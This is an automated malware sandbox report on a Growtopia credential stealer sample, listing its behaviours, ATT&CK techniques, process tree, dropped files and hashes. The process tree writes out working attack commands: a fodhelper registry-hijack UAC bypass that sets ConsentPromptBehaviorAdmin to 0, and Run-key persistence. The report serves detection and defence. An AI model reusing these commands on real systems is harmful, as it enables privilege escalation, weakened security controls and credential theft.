growtopia | 44d150b890d0d9440e430d47f2b5aeb2c6b5148bbe8cfabf83dcb4f89abdef2e

Analysis

max time kernel
93s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
04-04-2024 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe
Size

426KB
MD5

af382cfb9632dde6f7de3f2d0a76e103
SHA1

2ace18dcd993145b4367dbb13cc1b5e99c3eeaf0
SHA256

44d150b890d0d9440e430d47f2b5aeb2c6b5148bbe8cfabf83dcb4f89abdef2e
SHA512

4987935c732c974760b0de0d54bdef75ce0a75cf88d698e3014b974828f2d370576aa7dd79ac661f14141fd36b41e844f581a9808ea2f6eabfbc3ab5b7fba0cf
SSDEEP

6144:tYvr7D1PE/3BcL9l5bUsgFxvJqBIeAZtvHLPKKzAI17JY0H+kK1e:tGPD549FRaSkT1e

Score

10^/10

growtopia evasion persistence spyware stealer trojan

Malware Config

Signatures

Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

Processes:

Exafarm Loader.exe

pid	Process
4180	Exafarm Loader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Exafarm Loader.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exafarm Loader = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exafarm Loader"	Exafarm Loader.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

powershell.exe

description	ioc	Process
File opened (read-only)	\??\F:	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
15	icanhazip.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
4108	4180	WerFault.exe	86

Modifies registry class 7 IoCs

Processes:

reg.exereg.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\system32\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
3160	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
620	powershell.exe
620	powershell.exe
2772	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	620	powershell.exe
Token: SeIncreaseQuotaPrivilege	620	powershell.exe
Token: SeSecurityPrivilege	620	powershell.exe
Token: SeTakeOwnershipPrivilege	620	powershell.exe
Token: SeLoadDriverPrivilege	620	powershell.exe
Token: SeSystemProfilePrivilege	620	powershell.exe
Token: SeSystemtimePrivilege	620	powershell.exe
Token: SeProfSingleProcessPrivilege	620	powershell.exe
Token: SeIncBasePriorityPrivilege	620	powershell.exe
Token: SeCreatePagefilePrivilege	620	powershell.exe
Token: SeBackupPrivilege	620	powershell.exe
Token: SeRestorePrivilege	620	powershell.exe
Token: SeShutdownPrivilege	620	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeSystemEnvironmentPrivilege	620	powershell.exe
Token: SeRemoteShutdownPrivilege	620	powershell.exe
Token: SeUndockPrivilege	620	powershell.exe
Token: SeManageVolumePrivilege	620	powershell.exe
Token: 33	620	powershell.exe
Token: 34	620	powershell.exe
Token: 35	620	powershell.exe
Token: 36	620	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exeExafarm Loader.execmd.exefodhelper.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2248 wrote to memory of 4180	2248	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	86
PID 2248 wrote to memory of 4180	2248	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	86
PID 2248 wrote to memory of 4180	2248	af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe	86
PID 4180 wrote to memory of 2512	4180	Exafarm Loader.exe	87
PID 4180 wrote to memory of 2512	4180	Exafarm Loader.exe	87
PID 2512 wrote to memory of 4700	2512	cmd.exe	89
PID 2512 wrote to memory of 4700	2512	cmd.exe	89
PID 2512 wrote to memory of 5032	2512	cmd.exe	90
PID 2512 wrote to memory of 5032	2512	cmd.exe	90
PID 2512 wrote to memory of 4528	2512	cmd.exe	92
PID 2512 wrote to memory of 4528	2512	cmd.exe	92
PID 4528 wrote to memory of 804	4528	fodhelper.exe	94
PID 4528 wrote to memory of 804	4528	fodhelper.exe	94
PID 804 wrote to memory of 3160	804	cmd.exe	96
PID 804 wrote to memory of 3160	804	cmd.exe	96
PID 4180 wrote to memory of 1044	4180	Exafarm Loader.exe	98
PID 4180 wrote to memory of 1044	4180	Exafarm Loader.exe	98
PID 4180 wrote to memory of 1400	4180	Exafarm Loader.exe	103
PID 4180 wrote to memory of 1400	4180	Exafarm Loader.exe	103
PID 1400 wrote to memory of 620	1400	cmd.exe	105
PID 1400 wrote to memory of 620	1400	cmd.exe	105
PID 4180 wrote to memory of 2876	4180	Exafarm Loader.exe	110
PID 4180 wrote to memory of 2876	4180	Exafarm Loader.exe	110
PID 4180 wrote to memory of 2820	4180	Exafarm Loader.exe	112
PID 4180 wrote to memory of 2820	4180	Exafarm Loader.exe	112
PID 4180 wrote to memory of 3940	4180	Exafarm Loader.exe	114
PID 4180 wrote to memory of 3940	4180	Exafarm Loader.exe	114
PID 3940 wrote to memory of 2772	3940	cmd.exe	116
PID 3940 wrote to memory of 2772	3940	cmd.exe	116
PID 4180 wrote to memory of 448	4180	Exafarm Loader.exe	117
PID 4180 wrote to memory of 448	4180	Exafarm Loader.exe	117

C:\Users\Admin\AppData\Local\Temp\af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\af382cfb9632dde6f7de3f2d0a76e103_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UAC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
      4⤵
      Modifies registry class
      PID:4700
  - - C:\Windows\system32\reg.exe
      REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
      4⤵
      Modifies registry class
      PID:5032
  - - C:\Windows\system32\fodhelper.exe
      fodhelper.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4528
    - - C:\windows\system32\cmd.exe
        
        "C:\windows\system32\cmd.exe" /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:804
      - C:\Windows\system32\reg.exe
        
        REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        Modifies registry key
        
        PID:3160
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DC.exe" /D
    3⤵
    PID:1044
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MAC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell get-NetAdapter
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:620
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\GenReg.exe" [29549]--[140496283]--[14774,14774c,14774w,14774wc]--[105372212,105372212c]
    3⤵
    PID:2876
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WBPVBat.bat"
    3⤵
    PID:2820
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c Powershell.exe -NoProfile -ExecutionPolicy unrestricted -file "C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell.exe -NoProfile -ExecutionPolicy unrestricted -file "C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1"
      4⤵
      Enumerates connected drives
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2772
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ScanPC.bat"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 1884
    3⤵
    - Program crash
    PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 4180 -ip 4180
1⤵
PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97748f71ed95026706014e8524266292

SHA1
f60663ea2e2a778c57d07d9678fe04c79c3ff942

SHA256
f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

SHA512
b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe

Filesize
151KB

MD5
a5649742d25bd68b1db70b70b3012d50

SHA1
469f0f58b70db096c8e0ecc30252d26fe274ff76

SHA256
f2adef7d44afd81ae29ff66853f7db11c5959d22439cd623291638dc657fca38

SHA512
b5db014aab517a28959562bde768c375805cdff9a1f241460da849e0637dfafe88d4c7dc9129e7c63b651a3a8bbd6b9721d47c8a53182f1151893f419aac0a71

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAC.bat

Filesize
42B

MD5
56120ea7d97e691243935b98d32f4b65

SHA1
f89f6249a946882410de06765ec07e11f2608177

SHA256
1d6a29ec8b4f624b3246450c2a34ae1a8b3e35cdc7f3fa86a680e14169e01a67

SHA512
4cda70d6283fc48105a64c157c50fbe61bc5c77aa0f28e8c1176943cfdfa4345df77f09573d49ff896830cfc8315547a453a7bcbe68c00dd140b99ead94c8b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAC.zb

Filesize
369B

MD5
99f4fc35779ab4c04498da68912b44d3

SHA1
dfcc4a92bd19edf4f975ede6158f8dd11f2694b2

SHA256
b2daf2ba21f1cbe46084845a350eadf972940434572be17ddd0a58f5753bf2b5

SHA512
9fc806360e8a985d4c598a0bd613072187ff0451c534ce08f9da3479ae002071f7831ce8a0035bb4815ddf2d499f735bbb49f0ae96847a0a8779d4c2545dd50c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ScanPC.bat

Filesize
65B

MD5
fe76c9e647f358368eaf4e222e204dc6

SHA1
c94ea01f006620f2adedf56a377ad452b30be98a

SHA256
46aa77e7b80cab973f35033380be8dd8924bc7a5f43990037359809baf628244

SHA512
fd1b4fe5bc64813614a847d9552d4e29a9ec9957f4e7a94176d65298293412213f0255400bf55d188a4a159575d611a072fce999e2253adf0be8f382af977daa

Download Submit
C:\Users\Admin\AppData\Local\Temp\UAC.bat

Filesize
351B

MD5
84e809c3854f97339e11bb74129f69d1

SHA1
63e45ca731eeb00cbbd89b8870c1cdeeaf6c8ef0

SHA256
c9db5db63e80c488a96460c775e88a7208e6ca278f14128a1267d4d6f3f3187c

SHA512
e8d313fc47f247770e3c346c7a9fe13902e80f1e2a37e08a46a7c0a3026cc3939a84a321f90d09b5aa9f6e7aa0dc799d86bc58e417e8bd4e197d5b62d23dacc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WBPVBat.bat

Filesize
45B

MD5
8f6fe19e0609ab1352a0789cc2f26930

SHA1
0e03b9c99795d0edece5b885211d142e21df56bc

SHA256
390d8088e112cd92ed0f9be3ac1cc127e6cdf482d0b7546ec869c73d85a6d682

SHA512
d4fce506abdb0c25564a99b1d49e067197d61b2fc43fcc7bb063d1fc084cc1591162ae8a3c20c78558bb0543ea892323aacc4d609658ea1593f936f1ff13b17a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1

Filesize
253B

MD5
c2a812a536121ead50a97e6dca817b19

SHA1
d56a1b38c4161f03e01bc95e3d5172c1b54b6143

SHA256
e73f61c7505305910b75d1794b43b1d3030034459e2cb0e723d4f3b16384554e

SHA512
bab9271abc4e6da9c7c3aba74ec59e98d4325888235d1e364045ddaeef5aec42342ef4683a4541019f7190af160f555d673e9924ab8daf09b8816350b4d2ce46

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbcht0n3.scc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/620-47-0x00007FF8312C0000-0x00007FF831D81000-memory.dmp

Filesize
10.8MB

Download
memory/620-40-0x0000014F37DF0000-0x0000014F37E12000-memory.dmp

Filesize
136KB

Download
memory/620-43-0x0000014F1ECF0000-0x0000014F1ED00000-memory.dmp

Filesize
64KB

Download
memory/620-42-0x0000014F1ECF0000-0x0000014F1ED00000-memory.dmp

Filesize
64KB

Download
memory/620-39-0x00007FF8312C0000-0x00007FF831D81000-memory.dmp

Filesize
10.8MB

Download
memory/620-41-0x0000014F1ECF0000-0x0000014F1ED00000-memory.dmp

Filesize
64KB

Download
memory/2248-12-0x00007FF832910000-0x00007FF8333D1000-memory.dmp

Filesize
10.8MB

Download
memory/2248-0-0x0000000000A70000-0x0000000000AE0000-memory.dmp

Filesize
448KB

Download
memory/2248-2-0x00007FF832910000-0x00007FF8333D1000-memory.dmp

Filesize
10.8MB

Download
memory/2772-55-0x000001609F3B0000-0x000001609F3C0000-memory.dmp

Filesize
64KB

Download
memory/2772-56-0x000001609F3B0000-0x000001609F3C0000-memory.dmp

Filesize
64KB

Download
memory/2772-54-0x00007FF831370000-0x00007FF831E31000-memory.dmp

Filesize
10.8MB

Download
memory/2772-70-0x00007FF831370000-0x00007FF831E31000-memory.dmp

Filesize
10.8MB

Download
memory/2772-69-0x000001609F3B0000-0x000001609F3C0000-memory.dmp

Filesize
64KB

Download